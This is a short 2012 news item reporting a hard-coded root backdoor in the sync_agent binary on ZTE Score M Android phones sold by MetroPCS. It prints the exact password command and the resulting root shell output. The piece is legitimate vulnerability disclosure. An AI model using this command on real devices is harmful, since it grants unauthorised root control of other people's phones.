James Delahunty
14 May 2012 20:41
Flaw can give root to any app, as long as the password is right.
The Pastebin post referred to the ZTE Score M on MetroPCS in the United States. It runs the Android 2.3.4 (Gingerbread) operating system.
There is a setuid-root application at /system/bin/sync_agent that serves no function besides providing a root shell backdoor on the device.
Just give the magic, hard-coded password to get a root shell:
$ sync_agent ztex1609523
# id
uid=0(root) gid=0(root)
Nice backdoor, ZTE.